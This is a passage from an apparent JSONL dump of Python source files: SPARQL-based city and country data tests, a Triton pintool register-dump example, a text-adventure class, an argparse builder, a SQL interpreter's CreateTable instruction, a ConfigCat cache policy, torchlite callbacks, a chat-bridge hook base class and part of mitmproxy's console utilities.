in cache\n '''\n cim=CityManager(name=\"github\")\n cim.fromLutangar()\n cim.store(cim.cityList)\n\n\n def testCities(self):\n '''\n test consolidating cities from different sources\n '''\n cim=CityManager('lutangarVersusOpenResearch')\n startTime=time.time()\n cim.fromLutangar()\n self.assertEqual(128769,(len(cim.cityList)))\n print (\"reading %d cities from github took %5.1f secs\" % (len(cim.cityList),time.time()-startTime))\n startTime=time.time()\n orCities=cim.fromOpenResearch(showProgress=True)\n cityCounter=Counter(orCities)\n uniqueCities=list(cityCounter.most_common())\n print (\"reading %d cities from 
%d events from openresearch took %5.1f secs\" % (len(uniqueCities),len(orCities),time.time()-startTime))\n print (cityCounter.most_common(1000))\n orCityList=[]\n for cityName,count in uniqueCities:\n orCityList.append({'name': cityName, 'count': count})\n startTime=time.time()\n validCities=LOD.intersect(cim.cityList, orCityList, 'name')\n print (\"validating %d cities from openresearch took %5.1f secs\" % (len(validCities),time.time()-startTime))\n\n def getDBPedia(self,mode='query',debug=False):\n endpoint=\"http://dbpedia.org/sparql\"\n dbpedia=SPARQL(endpoint,mode=mode,debug=debug)\n return dbpedia\n\n def testDBPediaCities(self):\n '''\n https://github.com/LITMUS-Benchmark-Suite/dbpedia-graph-convertor/blob/master/get_data.py\n '''\n # kglf\n return\n dbpedia=self.getDBPedia()\n limit=100\n # Query to get the population of cities\n citiesWithPopulationQuery = \"\"\"\n PREFIX dbo: \n PREFIX dbp: \n PREFIX dbr: \n SELECT DISTINCT ?dbCity ?country ?name ?website ?population\n WHERE {\n ?dbCity a dbo:City .\n ?dbCity dbp:name ?name .\n ?dbCity dbo:country ?country .\n OPTIONAL { ?dbCity dbo:populationTotal ?population . }\n OPTIONAL { ?dbCity dbp:website ?website . }\n }\n LIMIT %d\n \"\"\" % limit\n cityList=dbpedia.queryAsListOfDicts(citiesWithPopulationQuery)\n cim=CityManager(\"dbpedia\")\n LOD.setNone4List(cityList, [\"population\",\"website\"])\n cim.store(cityList)\n\n def testDBPediaCountries(self):\n '''\n http://dbpedia.org/ontology/Country\n '''\n # kglf \n return\n dbpedia=self.getDBPedia()\n countriesQuery=\"\"\"\n # https://opendata.stackexchange.com/a/7660/18245 - dbp:iso3166code not set ...\n PREFIX dbo: \nSELECT ?country_name ?population ?isocode\nWHERE {\n ?country_name a dbo:Country .\n ?country_name dbp:iso3166code ?isocode.\n OPTIONAL { ?country_name dbo:populationTotal ?population . 
}\n}\n \"\"\"\n countriesResult=dbpedia.query(countriesQuery)\n print(countriesResult)\n print(len(countriesResult))\n\n def getEndPoint(self):\n endpoint=\"https://query.wikidata.org/sparql\"\n # check we have local wikidata copy:\n if getpass.getuser()==\"travis\":\n endpoint=None\n elif getpass.getuser()==\"wf\":\n # use 2018 wikidata copy\n #endpoint=\"http://blazegraph.bitplan.com/sparql\"\n # use 2020 wikidata copy\n endpoint=\"http://jena.zeus.bitplan.com/wikidata\"\n return endpoint\n\n def testWikiDataCities(self):\n '''\n test getting cities(human settlements to be precise)\n from Wikidata\n '''\n #endpoint=self.getEndPoint()\n # force caching - 3.5 hour query if done via endpoint!\n endpoint=None\n cm=CityManager(\"wikidata\")\n cm.endpoint=endpoint\n cm.fromCache()\n print(\"found %d cities\" % len(cm.cityList))\n self.assertTrue(len(cm.cityList)>=200000)\n\n def testWikiDataProvinces(self):\n '''\n test getting provinces from wikidata\n '''\n pm=ProvinceManager(\"wikidata\")\n pm.endpoint=self.getEndPoint()\n pm.fromCache()\n print(\"found %d provinces\" % len(pm.provinceList))\n self.assertTrue(len(pm.provinceList)>=195)\n\n def testWikiDataCountries(self):\n '''\n check local wikidata\n '''\n cm=CountryManager(\"wikidata\")\n cm.endpoint=self.getEndPoint()\n cm.fromCache()\n self.assertTrue(len(cm.countryList)>=195)\n\n # sparql=TestJena.getJena(debug=self.debug)\n # errors=cm.storeToRDF(sparql)\n # self.assertFalse(sparql.printErrors(errors))\n # doimport=True\n # if doimport:\n # cm2=CountryManager()\n # cm2.fromRDF(sparql)\n # self.assertEqual(cm.countryList,cm2.countryList)\n\n def testCountryManager(self):\n '''\n test storying countries in SQL format\n '''\n cm=CountryManager(\"github\",debug=True)\n cm.fromErdem()\n cm.store(cm.countryList)\n\n \n def testIntersection(self):\n '''\n test creating the intersection of a list of dictionaries\n '''\n list1 = [{'count': 351, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 332, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 336, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 359, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 309, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'}]\n\n list2 = [{'count': 359, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 351, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 381, 'evt_datetime': datetime.datetime(2015, 10, 22, 8, 45), 'att_value': 'red'}]\n\n listi=LOD.intersect(list1, list2,'count')\n print(listi)\n self.assertEquals(2,len(listi))\n listi=LOD.intersect(list1, list2)\n print(listi)\n self.assertEquals(2,len(listi))\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n"} {"ext": "py", "sha": "1a3000fe29d6bffbc1632b67fc91192b9e58c865", "content": "\nfrom triton import *\nfrom pintool import *\n\n# Output\n#\n# $ ./triton ./src/examples/pin/callback_signals.py ./src/samples/others/signals\n# Signal 11 received on thread 0.\n# ========================== DUMP ==========================\n# rax: 0x00000000000000 ((_ zero_extend 32) (_ bv234 32))\n# rbx: 0x00000000000000 UNSET\n# rcx: 0x00000000001ba4 ((_ zero_extend 32) ((_ extract 31 0) #81))\n# rdx: 0x0000000000000b ((_ sign_extend 32) ((_ extract 31 0) #34))\n# rdi: 0x00000000001ba4 ((_ sign_extend 32) ((_ 
extract 31 0) #83))\n# rsi: 0x00000000001ba4 ((_ sign_extend 32) ((_ extract 31 0) #90))\n# rbp: 0x007fff097e3540 ((_ extract 63 0) #0)\n# rsp: 0x007fff097e3528 (bvsub ((_ extract 63 0) #47) (_ bv8 64))\n# rip: 0x007f3fa0735ea7 (_ bv139911251582629 64)\n# r8: 0x007f3fa0a94c80 UNSET\n# r9: 0x007f3fb671b120 UNSET\n# r10: 0x00000000000000 UNSET\n# r11: 0x007f3fa0735e70 UNSET\n# r12: 0x00000000400460 UNSET\n# r13: 0x007fff097e3620 UNSET\n# r14: 0x00000000000000 UNSET\n# r15: 0x00000000000000 UNSET\n# xmm0: 0x000000ff000000 UNSET\n# xmm1: 0x2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f UNSET\n# xmm2: 0x00000000000000 UNSET\n# xmm3: 0x00ff000000ff00 UNSET\n# xmm4: 0x000000000000ff UNSET\n# xmm5: 0x00000000000000 UNSET\n# xmm6: 0x00000000000000 UNSET\n# xmm7: 0x00000000000000 UNSET\n# xmm8: 0x00000000000000 UNSET\n# xmm9: 0x00000000000000 UNSET\n# xmm10: 0x00000000000000 UNSET\n# xmm11: 0x00000000000000 UNSET\n# xmm12: 0x00000000000000 UNSET\n# xmm13: 0x00000000000000 UNSET\n# xmm14: 0x00000000000000 UNSET\n# xmm15: 0x00000000000000 UNSET\n# af: 0x00000000000000 (ite (= (_ bv16 64) (bvand (_ bv16 64) (bvxor #12 (bvxor ((_ extract 63 0) #0) (_ bv16 64))))) (_ bv1 1) (_ bv0 1))\n# cf: 0x00000000000000 (_ bv0 1)\n# df: 0x00000000000000 UNSET\n# if: 0x00000000000001 UNSET\n# of: 0x00000000000000 (_ bv0 1)\n# pd: 0x00000000000001 (ite (= (parity_flag ((_ extract 7 0) #73)) (_ bv0 1)) (_ bv1 1) (_ bv0 1))\n# sf: 0x00000000000000 (ite (= ((_ extract 31 31) #73) (_ bv1 1)) (_ bv1 1) (_ bv0 1))\n# tf: 0x00000000000000 UNSET\n# zf: 0x00000000000001 (ite (= #73 (_ bv0 32)) (_ bv1 1) (_ bv0 1))\n\n\n\ndef signals(threadId, sig):\n print 'Signal %d received on thread %d.' %(sig, threadId)\n print '========================== DUMP =========================='\n regs = getParentRegisters()\n for reg in regs:\n value = getCurrentRegisterValue(reg)\n exprId = getSymbolicRegisterId(reg)\n print '%s:\\t%#016x\\t%s' %(reg.getName(), value, (getSymbolicExpressionFromId(exprId).getAst() if exprId != SYMEXPR.UNSET else 'UNSET'))\n return\n\n\nif __name__ == '__main__':\n\n # Set architecture\n setArchitecture(ARCH.X86_64)\n\n # Start the symbolic analysis from the Entry point\n startAnalysisFromEntry()\n\n # Add a callback.\n insertCall(signals, INSERT_POINT.SIGNALS)\n\n # Run the instrumentation - Never returns\n runProgram()\n\n"} {"ext": "py", "sha": "1a300115d079adedd687bd2d5d6b2ab5068a5a87", "content": "from core.room import Room\n\n\nclass Player():\n def __init__(self, current_room, inventory = []):\n # self.name = name\n self.current_room = current_room\n self.inventory = inventory\n\n def room_info(self):\n name = self.current_room.name\n description = self.current_room.description\n return f'{name} - {description}'\n\n def investigate(self):\n item = self.current_room.items\n if item != None:\n return f'You see a {item}.'\n else:\n return \"There is nothing here.\"\n\n def remove_inventory(self):\n self.inventory = []\n"} {"ext": "py", "sha": "1a3002db951a683a9292c176146e1549f7244536", "content": "from argparse import ArgumentParser\nfrom ._version import __version__\n\ndef build_args_parser(\n prog: str,\n description: str = '',\n epilog: str = ''\n) -> ArgumentParser:\n\n parser = ArgumentParser(\n prog = prog,\n description = description,\n epilog = epilog\n )\n\n # Build Parser\n parser = add_arguments(parser)\n\n return parser\n\ndef add_arguments(parser: ArgumentParser) -> ArgumentParser:\n parser.add_argument(\n 'input',\n type=str,\n help='Path to an .xml SBOL file containing constructs designs and sequences'\n )\n 
parser.add_argument(\n 'output',\n type=str,\n help='Path to the output spreadsheet'\n )\n parser.add_argument(\n 'assembly_method',\n type=str,\n choices=[\"gibson\", \"golden_gate\", \"any_method\"],\n help='If \"any_method\" is selected, each construct can be built with any method. However, Golden Gate Assembly will have priority over Gibson Assembly'\n )\n parser.add_argument(\n '--nb_constructs',\n type=int,\n help='Maximum number of constructs to build (only used in tests)'\n )\n parser.add_argument(\n '--version',\n action='version',\n version='%(prog)s {}'.format(__version__),\n help='show the version number and exit'\n )\n return parser\n"} {"ext": "py", "sha": "1a30040ef7766bef0b11b045ff268440af4cf397", "content": "from Instrucciones.Declaracion import Declaracion\nfrom Instrucciones.Sql_create.Tipo_Constraint import Tipo_Constraint, Tipo_Dato_Constraint\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo\nfrom Instrucciones.TablaSimbolos.Instruccion import Instruccion\nfrom Instrucciones.TablaSimbolos.Tabla import Tabla\nfrom Instrucciones.Excepcion import Excepcion\nfrom storageManager.jsonMode import *\nfrom Instrucciones.Tablas.Tablas import Tablas\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo, Tipo_Dato\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo, Tipo_Dato\nfrom Instrucciones.Tablas.Campo import Campo\nfrom Optimizador.C3D import *\nfrom Instrucciones.TablaSimbolos import Instruccion3D as c3d\n\nclass CreateTable(Instruccion):\n def __init__(self, tabla, tipo, campos, herencia, strGram ,linea, columna):\n Instruccion.__init__(self,tipo,linea,columna, strGram)\n self.tabla = tabla\n self.campos = campos\n self.herencia = herencia\n \n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n # Ambito para la tabla\n tablaLocal = Tabla(tabla)\n compuesta = True\n #SE VALIDA QUE SE HAYA SELECCIONADO UN BD\n if arbol.bdUsar != None:\n for camp in self.campos:\n if isinstance(camp, Tipo_Constraint):\n tc=self.campos.pop(int(self.campos.index(camp)))\n if tc.tipo == Tipo_Dato_Constraint.UNIQUE or tc.tipo == Tipo_Dato_Constraint.PRIMARY_KEY or tc.tipo == Tipo_Dato_Constraint.FOREIGN_KEY:\n for id in tc.expresion:\n bid=False\n for ct in self.campos:\n if ct.nombre== id:\n if self.campos[self.campos.index(ct)].constraint == None:\n self.campos[self.campos.index(ct)].constraint=[]\n if tc.tipo == Tipo_Dato_Constraint.UNIQUE:\n self.campos[self.campos.index(ct)].constraint.append(Tipo_Constraint(self.tabla+\"_\"+ct.nombre+\"_pkey\", Tipo_Dato_Constraint.UNIQUE, None))\n if tc.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:\n compuesta = False\n self.campos[self.campos.index(ct)].constraint.append(Tipo_Constraint(self.tabla+\"_pkey\", Tipo_Dato_Constraint.PRIMARY_KEY, None))\n #if tc.tipo == Tipo_Dato_Constraint.FOREIGN_KEY:\n #self.campos[self.campos.index(ct)].constraint.append(Tipo_Constraint(None, Tipo_Dato_Constraint.UNIQUE, None))\n bid=True\n\n if not bid:\n error = Excepcion(\"42P10\",\"Semantico\",f\"La columna <<{id}>> no existe, Error en el Constraint\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return\n \n \n \n #SE VALIDA SI LA TABLA VA HEREDAR\n if self.herencia!=None:\n #SE BUSCA LA SI LA TABLA HEREDADA EXISTE\n htabla = arbol.devolverBaseDeDatos().getTabla(self.herencia)\n if htabla != None:\n tabla_temp=[]\n #SE RECORRE TODOS LAS COLUMNAS DE LA TABLA PARA UNIR CAMPOS REPETIDOS\n for campo_her in htabla.lista_de_campos:\n indice=0 \n bandera_campo=True\n for campo_nuevo in self.campos:\n if 
campo_her.nombre==campo_nuevo.nombre:\n tabla_temp.append(campo_nuevo)\n arbol.consola.append(f\"NOTICE: mezclando la columna <<{campo_nuevo.nombre}>> con la definición heredada.\")\n self.campos.pop(indice)\n indice+=1\n bandera_campo=False\n break\n if bandera_campo:\n tabla_temp.append(campo_her)\n tabla_temp = tabla_temp + self.campos\n self.campos= tabla_temp\n else:\n error = Excepcion(f\"42P01\",\"Semantico\",\"No existe la relación <<{self.herencia}>>.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return\n # VERIFICACIÓN LLAVES PRIMARIAS\n listaPrimarias = []\n for camp in self.campos:\n if isinstance(camp.tipo,Tipo):\n if camp.constraint != None:\n for s in camp.constraint:\n if s.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:\n listaPrimarias.append(camp)\n if len(listaPrimarias) > 1 and compuesta:\n error = Excepcion(\"42P16\",\"Semantico\",\"No se permiten múltiples llaves primarias para la tabla «\"+self.tabla+\"»\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n \n #SE CREA UN AMBITO PARA LA TABLA\n tablaNueva = Tablas(self.tabla,None)\n #SE LLENA LA TABLA EN MEMORIA\n for camp in self.campos:\n if isinstance(camp.tipo,Tipo):\n if camp.tipo.tipo == Tipo_Dato.TIPOENUM:\n existe = arbol.getEnum(camp.tipo.nombre)\n if existe == None:\n error = Excepcion('42P00',\"Semántico\",\"El tipo \"+camp.tipo.nombre+\" no existe\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n if camp.constraint != None:\n for s in camp.constraint:\n if s.tipo == Tipo_Dato_Constraint.CHECK:\n arbol.comprobacionCreate = True\n objeto = Declaracion(camp.nombre, camp.tipo, s.expresion)\n checkBueno = objeto.ejecutar(tablaLocal, arbol)\n if not isinstance(checkBueno,Excepcion):\n if s.id == None:\n s.id = self.tabla+\"_\"+camp.nombre+\"_\"+\"check1\"\n #tablaNueva.agregarColumna(camp.nombre,camp.tipo.toString(),None, camp.constraint)\n #continue\n pass\n else:\n #arbol.consola.append(checkBueno.toString())\n return\n elif s.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:\n if s.id == None:\n s.id = self.tabla+\"_pkey\"\n elif s.tipo == Tipo_Dato_Constraint.UNIQUE:\n if s.id == None:\n s.id = self.tabla+\"_\"+camp.nombre+\"_pkey\"\n tablaNueva.agregarColumna(camp.nombre,camp.tipo,None, camp.constraint)\n #tablaNueva.lista_constraint.append(camp.constraint)\n else:\n tablaNueva.agregarColumna(camp.nombre,camp.tipo,None, camp.constraint) \n #tablaNueva.lista_constraint.append(camp.constraint)\n arbol.comprobacionCreate = False\n #SE CREA LA TABLA EN DISCO\n ctable = createTable(arbol.bdUsar,self.tabla,len(self.campos))\n\n if ctable==0: #CUANDO LA TABLA SE CREA CORRECTAMENTE\n arbol.consola.append(f\"La Tabla: <<{self.tabla}>> se creo correctamente.\")\n arbol.agregarTablaABd(tablaNueva) \n elif ctable==3: #CUANDO LA TABLA YA EXISTE\n error = Excepcion(\"100\",\"Semantico\",\"La Tabla ya Existe.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n elif ctable==2: #CUANDO POR ALGUN ERROR NO SE CREA LA TABLA.\n error = Excepcion(\"100\",\"Semantico\",\"Error Interno.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n \n # SE AGREGAN LAS LLAVES PRIMARIAS A LA TABLA\n listaIndices = []\n resultado=0\n for i in listaPrimarias:\n listaIndices.append(tablaNueva.devolverColumna(i.nombre))\n if len(listaIndices) >0:\n #print(\"SE AGREGO 
UN INDICE\")\n resultado = alterAddPK(arbol.getBaseDatos(), self.tabla, listaIndices)\n if resultado == 1:\n error = Excepcion('XX000',\"Semántico\",\"Error interno\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 2:\n error = Excepcion('42P00',\"Semántico\",\"La base de datos \"+str(arbol.getBaseDatos())+\" no existe\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 3:\n error = Excepcion('42P01',\"Semántico\",\"No existe la relación \"+self.tabla,self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 4:\n error = Excepcion('42P16',\"Semántico\",\"No se permiten múltiples llaves primarias para la tabla «\"+self.tabla+\"»\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 5:\n error = Excepcion('XX002',\"Semántico\",\"Columna fuera de limites.\"+self.tabla,self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n else:\n error = Excepcion(\"100\",\"Semantico\",\"No ha seleccionado ninguna Base de Datos.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n\n def generar3D(self, tabla, arbol):\n super().generar3D(tabla,arbol)\n code = []\n t0 = c3d.getTemporal()\n code.append(c3d.asignacionString(t0, \"CREATE TABLE \" + self.tabla + \" (\\\\n\"))\n \n sizeCol = len(self.campos)\n contador = 1\n for col in self.campos:\n if isinstance(col, Campo):\n sizeCol -= 1\n elif not isinstance(col, Campo):\n lista = col.generar3D(tabla, arbol)\n code += lista\n tLast = c3d.getLastTemporal()\n if contador != sizeCol:\n t3 = c3d.getTemporal()\n code.append(c3d.operacion(t3, Identificador(tLast), Valor('\",\\\\n\"', \"STRING\"), OP_ARITMETICO.SUMA))\n contador += 1\n tLast = t3\n t2 = c3d.getTemporal()\n code.append(c3d.operacion(t2, Identificador(t0), Identificador(tLast), OP_ARITMETICO.SUMA))\n t0 = t2\n\n t1 = c3d.getTemporal()\n if self.herencia != None:\n code.append(c3d.operacion(t1, Identificador(t0), Valor('\"\\\\n) INHERITS (' + self.herencia + '\"', \"STRING\"), OP_ARITMETICO.SUMA))\n t0 = t1\n t1 = c3d.getTemporal()\n code.append(c3d.operacion(t1, Identificador(t0), Valor('\");\"', \"STRING\"), OP_ARITMETICO.SUMA))\n code.append(c3d.asignacionTemporalStack(t1))\n code.append(c3d.aumentarP())\n \n return code\n\nclass IdentificadorColumna(Instruccion):\n def __init__(self, id, linea, columna):\n self.id = id\n Instruccion.__init__(self,Tipo(Tipo_Dato.ID),linea,columna,strGram)\n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n variable = tabla.getVariable(self.id)\n if variable == None:\n error = Excepcion(\"42P10\",\"Semantico\",\"La columna \"+str(self.id)+\" no existe\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n self.tipo = variable.tipo\n return variable.valor.ejecutar(tabla, arbol)\n\n def generar3D(self, tabla, arbol):\n super().generar3D(tabla,arbol)"} {"ext": "py", "sha": "1a30050b9c482e1742df7e3ab1665fb4995cac5b", "content": "import logging\nimport sys\nfrom requests import HTTPError\n\nfrom .readwritelock import ReadWriteLock\nfrom .interfaces import CachePolicy\n\nlog = logging.getLogger(sys.modules[__name__].__name__)\n\n\nclass 
ManualPollingCachePolicy(CachePolicy):\n def __init__(self, config_fetcher, config_cache):\n self._config_fetcher = config_fetcher\n self._config_cache = config_cache\n self._lock = ReadWriteLock()\n\n def get(self):\n try:\n self._lock.acquire_read()\n\n config = self._config_cache.get()\n return config\n finally:\n self._lock.release_read()\n\n def force_refresh(self):\n force_fetch = False\n\n try:\n self._lock.acquire_read()\n config = self._config_cache.get()\n force_fetch = not bool(config)\n finally:\n self._lock.release_read()\n\n try:\n configuration_response = self._config_fetcher.get_configuration_json(\n force_fetch\n )\n if configuration_response.is_fetched():\n configuration = configuration_response.json()\n try:\n self._lock.acquire_write()\n self._config_cache.set(configuration)\n finally:\n self._lock.release_write()\n\n except HTTPError as e:\n log.error(\n \"Double-check your SDK Key at https://app.configcat.com/sdkkey.\"\n \" Received unexpected response: [%s]\" % str(e.response)\n )\n except:\n log.exception(sys.exc_info()[0])\n\n def stop(self):\n pass\n"} {"ext": "py", "sha": "1a30056debc252823120b2717a4d36ee3a01f83e", "content": "\"\"\"\nThis module contains callbacks used during the test phase.\n\"\"\"\nfrom torchlite.data.datasets import ImageDataset\nfrom tqdm import tqdm\n\n\nclass TestCallback:\n def __init__(self):\n self.validation_data = None\n self.params = None\n self.model = None\n\n def on_test_begin(self, logs=None):\n pass\n\n def on_test_end(self, logs=None):\n pass\n\n def on_batch_begin(self, batch, logs=None):\n pass\n\n def on_batch_end(self, batch, logs=None):\n pass\n\n\nclass TestCallbackList(object):\n \"\"\"Container abstracting a list of callbacks.\n Args:\n callbacks: List of `Callback` instances.\n queue_length: Queue length for keeping\n running statistics over callback execution time.\n \"\"\"\n\n def __init__(self, callbacks=None, queue_length=10):\n callbacks = callbacks or []\n self.callbacks = [c for c in callbacks]\n self.queue_length = queue_length\n\n def append(self, callback):\n assert isinstance(callback, TestCallback), \\\n \"Your callback is not an instance of TestCallback: {}\".format(callback)\n self.callbacks.append(callback)\n\n def on_test_begin(self, logs=None):\n \"\"\"Called at the beginning of testing.\n Args:\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_test_begin(logs)\n\n def on_test_end(self, logs=None):\n \"\"\"Called at the end of testing.\n Args:\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_test_end(logs)\n\n def on_batch_begin(self, batch, logs=None):\n \"\"\"Called right before processing a batch.\n Args:\n batch: integer, index of batch within the current epoch.\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_begin(batch, logs)\n\n def on_batch_end(self, batch, logs=None):\n \"\"\"Called at the end of a batch.\n Args:\n batch: integer, index of batch within the current epoch.\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_end(batch, logs)\n\n def __iter__(self):\n return iter(self.callbacks)\n\n\nclass TQDM(TestCallback):\n def __init__(self):\n super().__init__()\n self.pbar = None\n\n def on_test_begin(self, logs=None):\n test_loader_len = len(logs[\"loader\"])\n self.pbar = tqdm(total=test_loader_len, desc=\"Classifying\")\n\n def on_batch_end(self, batch, 
logs=None):\n self.pbar.update(1)\n\n def on_test_end(self, logs=None):\n print()\n\n\nclass ActivationMapVisualizerCallback(TestCallback):\n def __init__(self, filename):\n \"\"\"\n Store an image with heatmap activations in a heatmaps list\n using the Grad_cam++ technique: https://arxiv.org/abs/1710.11063\n # TODO may combines with TensorboardVisualizer?\n\n /!\\ This technique only works with image torchlite.data.datasets.ImagesDataset\n Args:\n filename (str): The file name that you want to visualize\n \"\"\"\n super().__init__()\n self.filename = filename\n self.heatmap = None\n\n def on_test_end(self, logs=None):\n model = self.model\n ds = logs[\"loader\"].dataset if logs[\"loader\"] else None\n assert isinstance(ds, ImageDataset), \\\n \"ActivationMapVisualizer: The loader is not an instance of torchlite.data.datasets.ImagesDataset\"\n image, label, _ = ds.get_by_name(self.filename)\n # TODO finish grad cam here https://github.com/adityac94/Grad_CAM_plus_plus/blob/master/misc/utils.py#L51\n\n @property\n def get_heatmap(self):\n return self.heatmap\n\n\nclass TTACallback(TestCallback):\n def __init__(self):\n \"\"\"\n Test time augmentation callback\n \"\"\"\n # TODO implement https://github.com/fastai/fastai/blob/master/fastai/learner.py#L242\n super().__init__()\n"} {"ext": "py", "sha": "1a30059e79652b426d539e42af781474e26d2df8", "content": "from .util import Configurable, Openable, pretty_str\n\n\n@pretty_str\nclass Hook(Configurable, Openable):\n \"\"\"\n Base of all hook classes, performs any form of processing on messages from all connected\n plugs, via the provided host instance.\n\n Instantiation may raise :class:`.ConfigError` if the provided configuration is invalid.\n\n Attributes:\n virtual (bool):\n ``True`` if managed by another component (e.g. a hook that exposes plug functionality).\n \"\"\"\n\n def __init__(self, name, config, host, virtual=False):\n super().__init__(name, config, host)\n self.virtual = virtual\n\n async def start(self):\n \"\"\"\n Perform any setup tasks.\n \"\"\"\n\n async def stop(self):\n \"\"\"\n Perform any teardown tasks.\n \"\"\"\n\n def on_load(self):\n \"\"\"\n Perform any additional one-time setup that requires other plugs or hooks to be loaded.\n \"\"\"\n\n async def channel_migrate(self, old, new):\n \"\"\"\n Move any private data between channels on admin request. This is intended to cover data\n keyed by channel sources and plug network identifiers.\n\n Args:\n old (.Channel):\n Existing channel with local data.\n new (.Channel):\n Target replacement channel to migrate data to.\n\n Returns:\n bool:\n ``True`` if any data was migrated for the requested channel.\n \"\"\"\n return False\n\n async def before_send(self, channel, msg):\n \"\"\"\n Modify an outgoing message before it's pushed to the network. The ``(channel, msg)`` pair\n must be returned, so hooks may modify in-place or return a different pair. This method is\n called for each hook, one after another. If ``channel`` is modified, the sending will\n restart on the new channel, meaning this method will be called again for all hooks.\n\n Hooks may also suppress a message (e.g. 
if their actions caused it, but it bears no value\n to the network) by returning ``None``.\n\n Args:\n channel (.Channel):\n Original source of this message.\n msg (.Message):\n Raw message received from another plug.\n\n Returns:\n (.Channel, .Message) tuple:\n The augmented or replacement pair, or ``None`` to suppress this message.\n \"\"\"\n return (channel, msg)\n\n async def before_receive(self, sent, source, primary):\n \"\"\"\n Modify an incoming message before it's pushed to other hooks. The ``sent`` object must be\n returned, so hooks may modify in-place or return a different object. This method is called\n for each hook, one after another, so any time-consuming tasks should be deferred to\n :meth:`process` (which is run for all hooks in parallel).\n\n Hooks may also suppress a message (e.g. if their actions caused it, but it bears no value\n to the rest of the system) by returning ``None``.\n\n Args:\n sent (.SentMessage):\n Raw message received from another plug.\n source (.Message):\n Original message data used to generate the raw message, if sent via the plug (e.g.\n from another hook), equivalent to ``msg`` if the source is otherwise unknown.\n primary (bool):\n ``False`` for supplementary messages if the source message required multiple raw\n messages in order to represent it (e.g. messages with multiple attachments where\n the underlying network doesn't support it), otherwise ``True``.\n\n Returns:\n .SentMessage:\n The augmented or replacement message, or ``None`` to suppress this message.\n \"\"\"\n return sent\n\n async def on_receive(self, sent, source, primary):\n \"\"\"\n Handle an incoming message received by any plug.\n\n Args:\n sent (.SentMessage):\n Raw message received from another plug.\n source (.Message):\n Original message data used to generate the raw message, if sent via the plug (e.g.\n from another hook), equivalent to ``msg`` if the source is otherwise unknown.\n primary (bool):\n ``False`` for supplementary messages if the source message required multiple raw\n messages in order to represent it (e.g. 
messages with multiple attachments where\n the underlying network doesn't support it), otherwise ``True``.\n \"\"\"\n\n def on_config_change(self, source):\n \"\"\"\n Handle a configuration change from another plug or hook.\n\n Args:\n source (.Configurable):\n Source plug or hook that triggered the event.\n \"\"\"\n\n def __repr__(self):\n return \"<{}: {}>\".format(self.__class__.__name__, self.name)\n\n\nclass ResourceHook(Hook):\n \"\"\"\n Variant of hooks that globally provide access to some resource.\n\n Only one of each class may be loaded, which happens before regular hooks, and such hooks are\n keyed by their class rather than a name, allowing for easier lookups.\n \"\"\"\n"} {"ext": "py", "sha": "1a3005cef96dbe2a43a46cf679a83e061a6ffb5c", "content": "import enum\nimport platform\nimport typing\nimport math\nfrom functools import lru_cache\nfrom publicsuffix2 import get_sld, get_tld\n\nimport urwid\nimport urwid.util\n\nfrom mitmproxy import flow\nfrom mitmproxy.http import HTTPFlow\nfrom mitmproxy.utils import human, emoji\nfrom mitmproxy.tcp import TCPFlow\nfrom mitmproxy import dns\nfrom mitmproxy.dns import DNSFlow\n\n# Detect Windows Subsystem for Linux and Windows\nIS_WINDOWS_OR_WSL = \"Microsoft\" in platform.platform() or \"Windows\" in platform.platform()\n\n\ndef is_keypress(k):\n \"\"\"\n Is this input event a keypress?\n \"\"\"\n if isinstance(k, str):\n return True\n\n\ndef highlight_key(str, key, textattr=\"text\", keyattr=\"key\"):\n l = []\n parts = str.split(key, 1)\n if parts[0]:\n l.append((textattr, parts[0]))\n l.append((keyattr, key))\n if parts[1]:\n l.append((textattr, parts[1]))\n return l\n\n\nKEY_MAX = 30\n\n\ndef format_keyvals(\n entries: typing.Iterable[typing.Tuple[str, typing.Union[None, str, urwid.Widget]]],\n key_format: str = 